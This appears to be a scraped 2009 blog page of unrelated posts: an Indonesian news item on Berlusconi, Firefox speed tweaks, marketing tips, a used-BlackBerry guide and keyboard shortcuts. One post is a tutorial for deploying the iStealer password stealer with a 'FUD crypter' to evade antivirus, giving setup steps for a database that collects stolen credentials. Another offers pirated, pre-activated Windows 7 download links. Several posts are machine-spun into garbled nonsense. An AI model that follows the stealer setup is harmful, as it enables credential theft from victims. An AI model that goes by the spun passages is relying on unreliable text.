Polisi berhasil menangkap seorang pria muda sedang berada di luar ruangan tempat Perdana Menteri Italia Silvio Berlusconi dirawat dan sepertinya berusaha masuk ke dalam. Demikian diberitakan AFP, Rabu 16/12)
Pria berusia 26 tahun itu dinyatakan memiliki masalah mental saat ia ditahan ketika hendak menuju ke ruangan sang perdana menteri pada pukul 02.00 dini hari. "Ia keluar dari lift ketika penjaga dan polisi menangkapnya segera," jelasnya.
"Ia mengatakan hendak berbicara dengan perdana menteri dan terlihat ia tidak memiliki sikap agresif atau membawa senjata yang dianggap membahayakan. Kami menemukan tongkat hoki di dalam kendaraannya," demikian disampaikan juru bicara Berlusconi.
Pihak kepolisian kini sedang menanyai pria tersebut. Pejabat kepolisian anti-terorisme mengatakan sang pria hanya ingin mengunjungi sang perdana menteri. Pria asal Turin ini ditahan di kantor polisi Milan namun akan segera dilepas. Pihak kepolisian juga menyatakan jika pria tersebut sepertinya pendukung fanatik sang perdana menteri yang berusia 73 tahun ini.
Berlusconi mengalami patah hidung dan wajah bersimbah darah saat seorang pria bernama Massimo Tartaglia (42) menyerangnya saat sedang memberikan tanda tangan. Selain hidung patah, perdana menteri kelahiran 29 September 1936 ini kehilang dua gigi dan bibirnya pun sobek.
Sementara, sang penyerangnya yang dianggap memiliki kelainan jiwa, sudah meminta maaf dan menyatakan tindakannya ini adalah suatu hal yang pengecut. Sang penyerang kemungkinan akan mendapat ancaman hukuman selama lima tahun penjara.
Berlusconi adalah pemilik dari tiga stasiun televisi analog, stasiun televisi digital, klub sepakbola AC Milan dan juga sejumlah majalah dengan tiras yang cukup besar. Kerajaan bisnisnya ini menguasai setengah dari pangsa pasar Italia.
Ia juga merupakan pendiri dan pemegang saham utama dari Fininvest yang juga salah satu dari perusahaan swasta di negara itu dan kini bergerak di bidang media dan keuangan.
Bersama With Ennio Doris, ia mendirikan Mediolanum, salah satu perusahaan perbankan dan asuransi terbesar di negara itu. Berlusconi juga bekerja sama dengan Pangeran Al-Waleed bin Talal dari Arab Saudi dan merupakan pemegang saham dari Mediaset yang merupakan milik publik.
Berlusconi yang diguncang skandal seks dan korupsi adalah pemilik dari klub AC Milan. Berdasarkan Majalah Forbes, Berlusconi adalah orang terkaya ketiga di Italia dengan aset sebesar 9,4 miliar dolar AS di tahun 2008.
Di bidang politik, Berlusconi memang penuh kontroversi namun meroket dengan cepat. Ia terpilih sebagai anggota parlemen untuk pertama kalinya dan penunjukan sebagai perdana menteri pada tahun 1994 melalui pemilu parlemen yang dipercepat. Meski demikian kabinetnya runtuh setengah tujuh bulan yang disebabkan banyaknya pertentangan dalam kabinet tersebut.
Ditahun 1996, melalui pemilu dipercepat, ia kembali mencalonkan diri sebagai perdana menteri namun dikalahkan oleh Romano Prodi. Pada Mei 2001, ia kembali melaju dan melawan kandidat Francesco Rutelli dan ia memenangkan pertarungan ini.
Pada pemilu parlemen April 2006, ia kembali melaju ke parlemen dan kembali melawan Romano Prodi dan ia kalah.
Pada pemilu parlemen April 2008 saat pemerintahan jatuh ia kembali terpilih dan ia diangkat sebagai perdana menteri pada 8 Mei 2008.
Lagi, Silvio Berlusconi Diincar Orang Gila
just4share, Friday, December 18, 2009tips mempercepat laju internet
just4share, Monday, December 14, 2009Speed up Mozilla Firefox
3-30x Faster!
1. Ketik di address bar Mozilla Firefox, "about:config"
Scroll kebawah, cari entries sbb:
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests
Normalnya browser request ke halaman web satu kali.
Bila kita enable pipelining, browser akan request beberapa kali dalam satu saat,
ini akan mempercepat page loading.
2. Isi entries sbb:
Set "network.http.pipelining" ke "true"
Set "network.http.proxy.pipelining" ke "true"
Set "network.http.pipelining.maxrequests" ke sembarang bilangan, 30 (misal).
ini akan membuat Browser melakukan 30 requests sekali jalan.
3. Klik kanan di sembarang tempat d dlm halaman browser, dan select New-> Integer.
Beri nama "nglayout.initialpaint.delay", dan set value ke "0".
Value= hitungan waktu tunggu browser sebelum bereaksi terhadap informasi yg sampai.
Akan lebih terasa bila memakai koneksi broadband, loading halaman bisa 2-30x lebih
cepat.
Coba saja..
email marketing campaign
just4share, Tuesday, December 1, 2009It seems that what emerged as complete email attempt and amenities administer just as able-bodied to email marketing. But its not just email marketing... it's able email marketing.
Where ahead academic belletrist and faxes acclimated to be the way to acquaint with audience and abeyant customers, the about-face to the 'softcopy' apple of the Web has meant that this aforementioned blazon of advice would accept to appear in a architecture pertinent to this new venue. Email and email business asserted itself as the prime adjustment of acquaintance then. From brochures to chump support, aggregate can now yield abode through a few types on the keyboard and few clicks of the mouse.
However, there still is a agreement and a able abode for able email marketing:
- Be clear
Email is a beneath anatomy of communication. There is no amplitude for aureate and candidly ego-soothing language. Basal abode applies, like able greetings and such, but on the whole, emails should be abbreviate and clear. Get to the point as anon as possible. Let your almsman apperceive what is accepted of him, what he stands to accretion through this communication, and how he can accretion it (for example, what he has to do, such as be aural the aboriginal hundred to appointment a website and appropriately acquire a discount)
- Action value, not information
Provide allurement for the email clairvoyant to apprehend and bang through. Add amount to your communication. Attract and seduce. Don't be afraid a boring, hum-drum email is deleted as anon as the almsman reads the aboriginal few lines. Entice, and do not accommodate too abundant advice in the content. The website is there for this purpose. The email is for communication.
- Prefer text
Graphics yield continued to amount and generally emails with cartoon and accessories are deleted anon or go to a clutter mail folder.
- Characterization your images if you use them.
Some humans get alone the argument in an email in their browser. If you cover cartoon but abort to characterization them, the accomplished bulletin may not accomplish faculty or the clairvoyant may not be enticed. Providing labels lets him apperceive what stands at such a abode in the message.
- Use a hook
You should aim to bolt the absorption of your clairvoyant from the aboriginal band itself. A acceptable angle works then. Its bulletin should be accordant and bright so that the chump can again anon adjudge to apprehend on or not. Remember that a clairvoyant is won through the aboriginal few curve itself.
- Abutment the hook
In the physique of your email, use accordant advice to abutment your angle and its message. However, be concise, as this isn't an befalling for an advice dump. Your advice should artlessly reinforce your hook.
- Be abbreviate and concise
Readers won't apprehend every chat that is down in an email. They usually browse the affair in whole. Use the amplitude you accept succinctly to aerate the befalling to butt the reader.
- Accommodate the a lot of important advice first
Make able use of the top amplitude of your email. Many readers apprehend email through a examination pane. The top third of your email will be displayed in this pane, and based on this information, a clairvoyant may adjudge to apprehend the abounding or annul the bulletin already.
mobipocket ebook : IT and Hacker
just4share, Monday, November 30, 2009Just wanted to share the kind of mobipocket ebook : IT and Hacker. It's all free for download.
let's begin ....
iStealer 5.1 + Tutorial
just4share, Saturday, November 28, 2009
Tools your need
-Password stealer(Here im using IStealer 5.0.1)
-Anonymous email(Anonymouse.org)
-Uploaded link(Use Free File Hosting Made Simple - MediaFire)
FUD crypter(To make your virus Undetectable!)
Follow this steps
Step 1:
Register at blackapplehosting.com
Step 2:
Go to UserCP.
Click "Create/delete MySQL database"
Name the database what you want, it will include your username.
In this example my username will be "example".
I have named my database "example_db"
Press "Create Database"
Now for the user, I have named mine "example_user"
Password can be anything, mine will be "passw0rd"
Press "Create User"
For Assign Priviledges, make sure the user and database are selected on the list.
When all boxes are ticked, press "Assign Priviledges"
REMOVE WINDOWS 7 WATERMARK
just4share, Thursday, November 26, 2009Click here to download the tool
how to buy used blackberry
just4share, Wednesday, November 25, 2009Buying a used BlackBerry is not as simple as buying any other used phone. Do not be fooled. There are several things you should look at before deciding to buy it.
You obviously need to check the product specification carefully. The reason, many end users can not access the service altogether because the PIN disuspen (rejected) or previously used a different type of operator services (PIN yet released).
One easy way of issue of this specification can be done by doing Wipe BlackBerry alias manually reset the device to previously existing data could be lost. How to Wipe is as follows:
Enter the menu OPTIONS>> SECURITY OPTIONS>> GENERAL SETTINGS>> Press the BlackBerry logo next to the green telephone image>> Select menu HANDHELD Wipe>> Typescript writings BlackBerry. Wipe any process running.
If the process is complete, then insert your SIM Card that can access the BlackBerry service.
See gprs/edge/3g print logo on the right side of your phone screen. If letter writing is still small, most likely disuspen phone PIN. This method can also further ensure that the memory will be empty, no longer filled with a variety of applications built from the previous owner.
On the other hand, you can also try to increase this capital by entering the menu OPTIONS, then ADVANCED OPTIONS, then HOST ROUTING TABLE, and then click on the symbol of the BlackBerry, and then select the menu REGISTER NOW.
If this is done two ways and small letters, big possibility of suspen personnel identification number / PIN is still happening so that the BlackBerry can be used only to call and SMS. Purchasers seken unit was also important to check IT policy by doing the following:
Enter the menu OPTIONS>> SECURITY OPTIONS>> FIREWALL. If the writing comes enabled with a red padlock logo on the side, then the former affected the BlackBerry Internet policy of the previous user.
Previous policies, such as BlackBerry Entreprise Service (BES), will make you unable to access internet services outside predetermined so comfortable surfing in cyberspace will be disturbed.
Thus, the two main key in buying the BlackBerry former is to ensure that the PIN is not disuspen and services are free of the previous user policy (PIN already released). Other procedures are no less important is the attention to the suitability PIN number and IMEI in the status menu in the box with your BlackBerry.
If it is different, it is advisable not to buy than the nuisance in the future. Another suggestion, might as well buy a standard phone. Eg good condition (smooth or not), quality microphone, keypad layout, the effect of the vibrator, and others.
What is clear, buy a BlackBerry is not as simple as it used to buy another used phone. Do not be fooled!
Marketing on a Budget
just4share, Friday, November 20, 2009A successful marketing plan doesn't have to include an athletic superstar, prime-time placement, state-of-the-art computer graphics or a massive budget. Being resourceful and smart can be just as effective.
Business promotion doesn't have to cost a fortune. Often, it's the personal touch that seals the deal. Here are ideas gathered from marketing experts to help you make the most of a slim marketing budget:
Use Press Release Power
You might not realize it, but reporters sometimes need you as much as you need them. The key to getting their attention is coming up with a newsworthy item that is concisely written.
* Peg your release to real events, such as fundraising drives or a new service your business offers. Don't be witty to amuse yourself the idea must have a concrete purpose.
* If you can't figure out why your company might be newsworthy, ask your friends what they find interesting about your company.
* You can also utilize your built-in research tool your customers. If you have an offbeat idea, bounce it off them or have them fill out a short questionnaire. Ask them why they use your business.
Think Differently
Concoct an event to draw media coverage. For instance, a Japanese restaurant could create the world's largest sushi roll and advertise its record-breaking "sushi queue."
Put A Face On It
Placing your photograph on your business card creates a personal relationship, even if they don't know you. Not only will people remember your name, they'll remember your face.
Print The Praise
If someone says, "You do a great job," say, "Thanks, very much, that means an awful lot to me. I would appreciate it if you would write a testimonial letter." Then make the testimonial part of your promotional package.
Borrow A Message
When you see an article on a subject that might interest your clients, send them a photocopy with a note that says, "I thought you might be interested in this." You're making a personal connection with a client and associating yourself with the authority quoted in the article in the process.
Think Outside The Box
You don't have to outspend your competition, you just have to outthink them. Some examples: Buy a billboard ad every other month for a year. Chances are, the billboard won't be replaced on the off months, so you'll get more exposure at no extra cost.
This concept also relates to how you run your business: Always try to figure out how to give your customers something they can't find elsewhere, such as a children's play area at a restaurant.
Try The Old Faithfuls
Don't dismiss time-honored solutions that increase your company's community profile, such as sponsoring a charity event or outfitting a local little league team. You'll get your name out there, and that's what counts.
10 Powerful Marketing Tips
just4share, Thursday, November 19, 200910 Powerful Marketing Tips
1. Print your best small ad on a postcard and mail it to prospects in your targeted market. People read postcards when the message is brief. A small ad on a postcard can drive a high volume of traffic to your web site and generate a flood of sales leads for a very small cost.
2. No single marketing effort works all the time for every business, so rotate several marketing tactics and vary your approach. Your customers tune out after awhile if you toot only one note. Not only that, YOU get bored. Marketing can be fun, so take advantage of the thousands of opportunities available for communicating your value to customers. But don't be arbitrary about your selection of a variety of marketing ploys. Plan carefully. Get feedback from customers and adapt your efforts accordingly.
3. Use buddy marketing to promote your business. For example, if you send out brochures, you could include a leaflet and/or business card of another business, which had agreed to do the same for you. This gives you the chance to reach a whole new pool of potential customers.
4. Answer Your Phone Differently. Try announcing a special offer when you answer the phone. For example you could say, "Good morning, this is Ann Marie with Check It Out; ask me about my special marketing offer." The caller is compelled to ask about the offer. Sure, many companies have recorded messages that play when you're tied up in a queue, but who do you know that has a live message? I certainly haven't heard of anyone. Make sure your offer is aggressive and increase your caller's urgency by including a not-so-distant expiration date.
5. Stick It! Use stickers, stamps and handwritten notes on all of your direct mail efforts and day-to-day business mail. Remember, when you put a sticker or handwritten message on the outside of an envelope, it has the impact of a miniature billboard. People read it first; however, the message should be short and concise so it can be read in less than 10 seconds.
6. Send A Second Offer To Your Customers Immediately After They've Purchased Your customer just purchased a sweater from your clothing shop. Send a handwritten note to your customer thanking them for their business and informing them that upon their return with "this note" they may take advantage of a private offer, such as 20% off their next purchase. To create urgency, remember to include an expiration date.
7. Newsletters. Did you know it costs six times more to make a sale to a new customer than to an existing one? You can use newsletters to focus your marketing on past customers. Keep costs down by sacrificing frequency and high production values. If printed newsletters are too expensive, consider an e-mail newsletter sent to people who subscribe at your Web site.
8. Seminars/ open house. Hosting an event is a great way to gain face time with key customers and prospects as well as get your company name circulating. With the right programming, you'll be rewarded with a nice turnout and media coverage. If it's a seminar, limit the attendance and charge a fee. A fee gives the impression of value. Free often connotes, whether intended or not, that attendees will have to endure a sales pitch.
9. Bartering. This is an excellent tool to promote your business and get others to use your product and services. You can trade your product for advertising space or for another company's product or service. This is especially helpful when two companies on limited budgets can exchange their services.
10. Mail Outs. Enclose your brochure, ad, flyer etc. in all your outgoing mail. It doesn't cost any additional postage and you'll be surprised at who could use what you're offering.
To learn more Powerful Marketing Tips order the full "Powerful Marketing Tips" report for only $9.00! Contact Check it Out at (772) 335-0073 or visit www.checkitoutinc.com.
Ann Marie Rubertone is a marketing consultant & freelance writer. Her two newest booklets, "The One Page Marketing Plan" and "13 Household Items You Can Use To Market Your Business" tips for marketing on a shoestring budget that can make the difference between success and failure. Check It Out is a customer-driven marketing firm providing design, writing, editing, desktop publishing services, and hands-on marketing workshops for independent professionals and small businesses. For more information, contact Ann Marie Rubertone, Check It Out (772) 335-0073, Port St. Lucie, FL www.checkitoutinc.comMicrosoft Windows 7 ULTIMATE x64 Integrated November 2009 OEM Pre Activated
just4share, Wednesday, November 18, 2009Info:
Windows 7 is the easiest, fastest, and most engaging version of Windows yet. Better ways to find and manage files, like Jump Lists and improved taskbar previews, help you speed through everyday tasks. Faster and more reliable performance means your PC just works the way you want it to. And great features like Windows Media Center and Windows Touch make new things possible. Get to know Windows 7, and see how it can simplify just about everything you do with your PC.
Windows 7 includes a number of new features, such as advances in touch and handwriting recognition, support for virtual hard disks, improved performance on multi-core processors, improved boot performance, DirectAccess, and kernel improvements. Windows 7 adds support for systems using multiple heterogeneous graphics cards from different vendors (Heterogeneous Multi-adapter), a new version of Windows Media Center, a Gadget for Windows Media Center, improved media features, the XPS Essentials Pack and Windows PowerShell being included, and a redesigned Calculator with multiline capabilities including Programmer and Statistics modes along with unit conversion. Many new items have been added to the Control Panel, including ClearType Text Tuner, Display Color Calibration Wizard, Gadgets, Recovery, Troubleshooting, Workspaces Center, Location and Other Sensors, Credential Manager, Biometric Devices, System Icons, and Display. Windows Security Center has been renamed to Windows Action Center (Windows Health Center and Windows Solution Center in earlier builds) which encompasses both security and maintenance of the computer. The default setting for User Account Control in Windows 7 has been criticized for allowing untrusted software to be launched with elevated privileges by exploiting a trusted application. Microsoft's Windows kernel engineer Mark Russinovich acknowledged the problem, but noted that there are other vulnerabilities that do not rely on the new setting.
Internet Spades, Internet Backgammon and Internet Checkers, which were removed from Windows Vista, were restored in Windows 7. Windows 7 will include Internet Explorer 8 and Windows Media Player 12. Users will also be able to disable many more Windows components than was possible in Windows Vista. New additions to this list of components include Internet Explorer, Windows Media Player, Windows Media Center, Windows Search, and the Windows Gadget Platform. Windows 7 includes 13 additional sound schemes, titled Afternoon, Calligraphy, Characters, Cityscape, Delta, Festival, Garden, Heritage, Landscape, Quirky, Raga, Savanna, and Sonata. A new version of Virtual PC, Windows Virtual PC Beta is available for Windows 7 Professional, Enterprise, and Ultimate editions. It allows multiple Windows environments, including Windows XP Mode, to run on the same machine, requiring the use of Intel VT-x or AMD-V. Windows XP Mode runs Windows XP in a virtual machine and redirects displayed applications running in Windows XP to the Windows 7 desktop. Furthermore Windows 7 supports the mounting of a virtual hard disk (VHD) as a normal data storage, and the bootloader delivered with Windows 7 can boot the Windows system from a VHD. The Remote Desktop Protocol (RDP) of Windows 7 is also enhanced to support real-time multimedia application including video playback and 3D games. That means that Direct X 10 can be used in a remote desktop environment. The three application limit will be removed from Windows 7 Starter
Installation:
Extract Files
Burn Image to DVD
Boot from DVD
Install to unpartitioned space without serial
No Serial and no Activation needed
Size: [2.84GB]
Apps: Pre Activated [200MB] Links
http://www.megaupload.com/?d=Q3L2BQV0
http://www.megaupload.com/?d=F2OW99JN
http://www.megaupload.com/?d=J4LH6SOL
http://www.megaupload.com/?d=0HZIVBTU
http://www.megaupload.com/?d=CKAZVU53
http://www.megaupload.com/?d=6U4459J4
http://www.megaupload.com/?d=3I81CC26
http://www.megaupload.com/?d=J7H0S09W
http://www.megaupload.com/?d=889BIF9C
http://www.megaupload.com/?d=ST9C0APN
http://www.megaupload.com/?d=C1O97GCB
http://www.megaupload.com/?d=9DNG3U9O
http://www.megaupload.com/?d=5N6VQI12
http://www.megaupload.com/?d=XXPQ3QNE
http://www.megaupload.com/?d=L2TGJJ6H
http://www.megaupload.com/?d=YG1A9HKF
TuneUp Utilities 2010 9.0.2010.11
just4share, Tuesday, November 17, 2009
TuneUp Utilities can make your Windows operating system faster, more comfortable and more secure with just a few mouse clicks. And all operations performed on the operating system are completely safe, because all changes are monitored by TuneUp Rescue Center and can be undone at any time. All TuneUp Utilities modules can be accessed through a common interface that is divided into six categories.
The software helps both beginners and experts to make Windows meet their needs in a way that is better, easier and safer. All important system options are explained in an easy way and can be turned on or off at the click of your mouse. TuneUp Utilities will then make the necessary changes in the registry or boot files automatically. We place a high value on system stability, so that Windows won't stop working reliably. And most changes that you make can be undone in TuneUp Rescue Center - easily and safely.
TuneUp Utilities automatically runs important maintenance tasks for you, makes you aware of any problems and offers simple solutions. This ensures performance is always at its best. A slow and untidy computer is now a thing of the past for you. You can also use TuneUp Utilities to customize the appearance of your Windows system - to make working on your computer more enjoyable.
With TuneUp Utilities you will quickly make your Windows system faster and more convenient to use- and ensure that it stays like this for the long term. This makes TuneUp Utilities the perfect program for everyone: for those who would rather leave the computer maintenance to a reliable partner as well as for those who would rather do everything themselves.
The TuneUp Turbo Mode provides an immediate performance boost whenever you need it. When you use your computer in the TuneUp Turbo Mode, an analysis is performed to see which tasks, programs and functions are currently running in the background that are not strictly necessary. These programs are stopped or slowed down, allowing the additional processing power gained to be used exclusively by the programs you are actually running.
Maintain System
Regular maintenance increases the stability of your PC, but is complicated and takes a lot of time when doing it manually. Spare yourself the stress! With TuneUp Utilities, you can clean up your computer and delete unnecessary files with only one click. Neat!
• 1-Click Maintenance and Automatic Maintenance
• Optimize system startup and shutdown
• Defragment hard disks
• Remove broken shortcuts
• Defragment registry
• Clean registry
Increase performance
Whether you are working or gaming: TuneUp Utilities increases the performance of your PC. Programs that are used rarely or never are tracked down, startup processes are shortened and unwanted garbage files are eliminated. For trouble-free working on your PC.
• Turbo Mode
• Configure Live Optimization
• Free up disk space
• Configure system startup
• Display and uninstall programs
Fix problems
With only a few clicks, you can fix typical Windows problems as easy as pie — without being a PC expert yourself. TuneUp Utilities finds errors on data carriers and fixes them automatically — about 60 of the most frequent problems under XP™, Vista™, and Windows 7™. TuneUp Utilities can even restore files deleted by accident — quickly, easily, and reliably.
• Fix typical problems
• Restore deleted data
• Check hard drive for errors
• Manage running programs
Customize Windows
Give your Windows a new look with TuneUp Utilities and customize programs and system settings to meet your needs: cool new boot screens, icons, and animations provide that personalized look for your Desktop. You can easily customize the appearance of Windows and settings of many programs to your liking.
• Personalize Windows appearance
• Change Windows settings
Additional functions
TuneUp Utilities offers you transparency and safety and keeps you up to date. Stay informed with the System information and Optimization Report, undo changes made accidentally, or check for available updates. From fast and safe editing of the registry to deleting data — even computer experts will find applications to meet their needs.You can find all the features that provide you with an overview of your PC and more security in this area.
• Display TuneUp Optimization Report
• Undo changes
• Check for updates
• Show system information
• Permanently erase data
• Editing the registry
Apple Safari for Windows 4.0.4
just4share,Experience the web, Apple style, with Safari: the fastest, easiest-to-use web browser in the world. With its simple, elegant interface, Safari gets out of your way and lets you enjoy the web - up to 2 times faster than Internet Explorer. Safari's clean, sleek look lets you focus on the web instead of your browser. The browser frame is a mere one pixel wide. You see a scroll bar only when you need one. You see no status bar by default a blue progress bar fills the address field as the page loads giving you more room to browse and view the web.
And with commonly used tools like a Google search field built right into Safari, you can get anywhere on the web faster.
Tabbed browsing, pop-up blocker and more are all fully implemented and supported.
Windows Requirements
* Any PC running Windows XP or Windows Vista or Windows 7
* 500-MHz Pentium-class processor or better
* 256MB of RAM
* Top Sites and Cover Flow require a compatible DirectX 9.0 video card with 64MB of video RAM. More details.
Preview
Windows Vista DreamScene
just4share, Friday, March 27, 2009
Have you ever wished that you could make your desktop background something more exciting than just a regular picture? Would you like to use a video, even a slide show of your favorite pictures, as your desktop background? If so, then you're in luck. Windows DreamScene can make this happen. With Windows DreamScene, you can use a video—either the ones that come with Windows DreamScene, or one of your own—as your desktop background, the same way you would've used a regular picture.
What exactly is Windows DreamScene?
Windows DreamScene is a Windows Ultimate Extra. Windows Ultimate Extras are designed for Windows Vista Ultimate customers to extend Windows features to make using your computer more fun. With Windows DreamScene, you can change your desktop background to a video clip, which runs in a continuous loop to make your desktop come to life.
Windows DreamScene is a utility that allows videos and other optimized animations to be used as desktop wallpapers. It is one of the Windows Ultimate Extras[1]. Prior to its official announcement, DreamScene was rumored to be in creation under the names Motion Desktop and Borealis. After several months of testing, the final version was released on September 25, 2007[3]
Rendered content included with DreamScene (such as an animated realization of the Windows Aurora background) was produced by Stardock,[3] while photographic content was provided by the Discovery Channel.[4][ Third-party video content in MPEG or WMV format may also be used.
One of the purported advantages of DreamScene over previous methods of desktop animation is that it makes use of the GPU for display instead of the CPU, leaving the latter free to perform user tasks.[4] To what extent this is achieved is not specified. When a full-screen program is run, such as a game or any window that is maximized, the video will automatically stop since the video will not be seen and will use less GPU and CPU. The video can also be stopped manually. Content encoders need to strive for a balance between compression and file size; decompression requires the CPU, but larger files take up more memory and may cause the disk to be accessed more frequently.
Running a video in the background would have a significant effect on the battery life of mobile computers, whether or not it were rendered by the GPU, so DreamScene may display a static background when a computer is running on batteries.[6] The software relies heavily on the Desktop Window Manager (or DWM, part of Windows Aero).
Stardock offers a chargeable add-on for Windows DreamScene, called DeskScapes. This software allows the implementation of dynamic wallpapers (".dream" files). They have released a new version (2.0), which makes the program compatible with non-Ultimate editions of Vista.
This collection is 61 videos in all that can be used also with stardock and dreamscene
Ultimate list off all keyboard shortcut
just4share, Sunday, March 15, 2009Before I start , I would recommend everyone to bookmark this page or save this page as HTML... coz its difficult to remember all these shortcuts...
Lets Start with some basic stuffs..
CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
DELETE (Delete)
CTRL+Z (Undo)
CTRL while dragging an item (Copy the selected item)
SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
F2 key (Rename the selected item)
CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next
word)
CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
CTRL+A (Select all)
F3 key (Search for a file or a folder)
ALT+ENTER (View the properties for the selected item)
ALT+F4 (Close the active item, or quit the active program)
ALT+ENTER (Display the properties of the selected object)
ALT+SPACEBAR (Open the shortcut menu for the active window)
CTRL+F4 (Close the active document in programs that enable you to have
multiple documents open simultaneously)
ALT+TAB (Switch between the open items)
ALT+ESC (Cycle through items in the order that they had been opened)
F4 key (Display the Address bar list in My Computer or Windows Explorer)
F6 key (Cycle through the screen elements in a window or on the desktop)
SHIFT+F10 (Display the shortcut menu for the selected item)
ALT+SPACEBAR (Display the System menu for the active window)
CTRL+ESC (Display the Start menu)
ALT+Underlined letter in a menu name (Display the corresponding menu)
Underlined letter in a command name on an open menu (Perform the corresponding command)
F10 key (Activate the menu bar in the active program)
RIGHT ARROW (Open the next menu to the right, or open a submenu)
LEFT ARROW (Open the next menu to the left, or close a submenu)
F5 key (Update the active window)
BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
ESC (Cancel the current task)
SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
Microsoft Natural Keyboard Shortcuts
Windows Logo (Display or hide the Start menu)
Windows Logo+BREAK (Display the System Properties dialog box)
Windows Logo+D (Display the desktop)
Windows Logo+M (Minimize all of the windows)
Windows Logo+SHIFT+M (Restore the minimized windows)
Windows Logo+E (Open My Computer)
Windows Logo+F (Search for a file or a folder)
CTRL+Windows Logo+F (Search for computers)
Windows Logo+F1 (Display Windows Help)
Windows Logo+ L (Lock the keyboard)
Windows Logo+R (Open the Run dialog box)
Windows Logo+U (Open Utility Manager)
Dialog Box Keyboard Shortcuts
CTRL+TAB (Move forward through the tabs)
CTRL+SHIFT+TAB (Move backward through the tabs)
TAB (Move forward through the options)
SHIFT+TAB (Move backward through the options)
ALT+Underlined letter (Perform the corresponding command or select the
corresponding option)
ENTER (Perform the command for the active option or button)
SPACEBAR (Select or clear the check box if the active option is a check box)
Arrow keys (Select a button if the active option is a group of option buttons)
F1 key (Display Help)
F4 key (Display the items in the active list)
BACKSPACE (Open a folder one level up if a folder is selected in the Save As
or Open dialog box)
Right SHIFT for eight seconds (Switch FilterKeys either on or off)
Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
SHIFT five times (Switch the StickyKeys either on or off)
NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
Windows Logo +U (Open Utility Manager)
Windows Explorer Keyboard Shortcuts
END (Display the bottom of the active window)
HOME (Display the top of the active window)
NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the
selected folder)
NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
NUM LOCK+Minus sign (-) (Collapse the selected folder)
LEFT ARROW (Collapse the current selection if it is expanded, or select the
parent folder)
RIGHT ARROW (Display the current selection if it is collapsed, or select the
first subfolder)
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
CTRL+O (Open a saved console)
CTRL+N (Open a new console)
CTRL+S (Save the open console)
CTRL+M (Add or remove a console item)
CTRL+W (Open a new window)
F5 key (Update the content of all console windows)
ALT+SPACEBAR (Display the MMC window menu)
ALT+F4 (Close the console)
ALT+A (Display the Action menu)
ALT+V (Display the View menu)
ALT+F (Display the File menu)
ALT+O (Display the Favorites menu)
Shortcut Keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
RIGHT ARROW (Move to the right or to the beginning of the next line)
LEFT ARROW (Move to the left or to the end of the previous line)
UP ARROW (Move up one row)
DOWN ARROW (Move down one row)
PAGE UP (Move up one screen at a time)
PAGE DOWN (Move down one screen at a time)
HOME (Move to the beginning of the line)
END (Move to the end of the line)
CTRL+HOME (Move to the first character)
CTRL+END (Move to the last character)
SPACEBAR (Switch between Enlarged and Normal mode when a character is
selected)
MMC Console Window Keyboard Shortcuts
CTRL+P (Print the current page or active pane)
ALT+Minus sign (-) (Display the window menu for the active console window)
SHIFT+F10 (Display the Action shortcut menu for the selected item)
F1 key (Open the Help topic, if any, for the selected item)
F5 key (Update the content of all console windows)
CTRL+F10 (Maximize the active console window)
CTRL+F5 (Restore the active console window)
ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
F2 key (Rename the selected item)
CTRL+F4 (Close the active console window. When a console has only one
console window, this shortcut closes the console)
Remote Desktop Connection Navigation
CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
ALT+PAGE UP (Switch between programs from left to right)
ALT+PAGE DOWN (Switch between programs from right to left)
ALT+INSERT (Cycle through the programs in most recently used order)
ALT+HOME (Display the Start menu)
CTRL+ALT+BREAK (Switch the client computer between a window and a full
screen)
ALT+DELETE (Display the Windows menu)
CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the
client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
Microsoft Internet Explorer Navigation
CTRL+B (Open the Organize Favorites dialog box)
CTRL+E (Open the Search bar)
CTRL+F (Start the Find utility)
CTRL+H (Open the History bar)
CTRL+I (Open the Favorites bar)
CTRL+L (Open the Open dialog box)
CTRL+N (Start another instance of the browser with the same Web address)
CTRL+O (Open the Open dialog box, the same as CTRL+L)
CTRL+P (Open the Print dialog box)
CTRL+R (Update the current Web page)
CTRL+W (Close the current window)
Windows Abuse Apparatus False
just4share, Saturday, March 14, 2009Often we use several accoutrement to abuse Windows so that the achievement of our windows we can terdongkrak significantly. However, agenda that not all accoutrement can advance the achievement as we expect. Not infrequently the apparatus appropriately aggravate the achievement of our Windows that was not optimal.
Here are some things that can be acclimated as a adviser afore we use the abuse apparatus offered, with the aim that we are no best a hit-and try tergiur with the affiance of added achievement offered by the pengembanganya.
1. Axis off the kernel-swap. Basically, this action alone provides anthology amount "1" admission in the anthology "DisablePagingExecutive". According to Microsoft, the amount of this modification is advantageous if SP3 for Windows NT / XP has not been shown. Currently, the admission is still there alone for affinity reasons, and does not accept any function. Even Tune Up Utility costs are actual big-ticket aswell action 'tweak' this.
